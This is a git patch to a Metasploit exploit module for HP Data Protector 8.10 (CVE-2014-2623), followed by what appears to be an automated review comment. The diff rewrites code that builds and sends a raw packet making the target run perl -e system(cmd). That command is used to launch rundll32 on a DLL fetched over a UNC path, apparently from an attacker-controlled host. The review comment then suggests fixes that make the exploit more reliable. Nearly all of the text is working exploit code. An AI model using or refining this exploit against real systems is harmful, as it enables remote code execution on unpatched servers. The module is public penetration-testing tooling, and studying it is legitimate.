From 62dde22d88d04d5c64937cfb1ed08ac6cc67e118 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 4 Mar 2015 12:27:58 -0600
Subject: [PATCH] Clean packet building
---
 .../misc/hp_dataprotector_dll_cmd_exec.rb | 29 ++++++++++---------
 1 file changed, 15 insertions(+), 14 deletions(-)
diff --git a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
index 6e6cef1673..62ccc45fbd 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
@@ -26,8 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 ['CVE', '2014-2623'],
+ ['OSVDB', '109069'],
 ['EDB', '34066'],
- ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
+ ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
 ],
 'DefaultOptions' =>
 {
@@ -37,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
+ [ 'HP Data Protector 8.10 / Windows', { } ],
 ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Nov 02 2014'))
@@ -90,21 +91,21 @@ class Metasploit3 < Msf::Exploit::Remote
 Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
 end
- def exec_bar(cmd)
+ def send_pkt(cmd)
 cmd.gsub!("\\", "\\\\\\\\")
- cmd_no = target['Offset'] + cmd.length
-
- pkt = "\x00\x00\x00"
- pkt << cmd_no
- pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
- pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
- pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
- pkt << "('#{cmd}')" # Executable
- pkt << "\x00"
+ pkt = "2\x00"
+ pkt << "\x01\x01\x01\x01\x01\x01\x00"
+ pkt << "\x01\x00"
+ pkt << "\x01\x00"
+ pkt << "\x01\x00"
+ pkt << "\x01\x01\x00 "
+ pkt << "28\x00"
+ pkt << "\\perl.exe\x00 "
+ pkt << "-esystem('#{cmd}')\x00"
 connect
- sock.put(pkt)
+ sock.put([pkt.length].pack('N') + pkt)
 disconnect
 end
@@ -114,6 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("#{peer} - Trying to execute remote DLL...")
 sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
- exec_bar(sploit)
+ send_pkt(sploit)
 end
 end
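Review bot: The new length prefix in `sock.put([pkt.length].pack('N') + pkt)` uses `String#length`, which counts characters, whereas a wire-format length field needs the byte count; with a `cmd` containing any multibyte character the prefix would be short, and concatenating the binary-encoded `pack` result with a UTF-8 `pkt` may also raise an encoding error, so `sock.put([pkt.bytesize].pack('N') + pkt)` is the safer form (the old `target['Offset'] + cmd.length` had the same issue, so this is not a regression, just unaddressed). The kept line `cmd.gsub!("\\", "\\\\\\\\")` mutates the caller's string in place — here the `sploit` local built in `exploit` — and a non-destructive `cmd = cmd.gsub("\\", "\\\\\\\\")` would keep `send_pkt` free of that side effect. The rewrite also drops the only explanatory comment the old body had; restoring it on the new line, `pkt << "-esystem('#{cmd}')\x00" # perl -e system('cmd')`, and adding a one-line comment above `pkt = "2\x00"` saying the fixed `\x01`/`\x00` fields and `"28\x00"` are taken verbatim from an observed request, would tell the next maintainer which bytes are protocol constants versus payload. The whole of `send_pkt` lies within this hunk; the `exploit` method touched by the last hunk starts outside it.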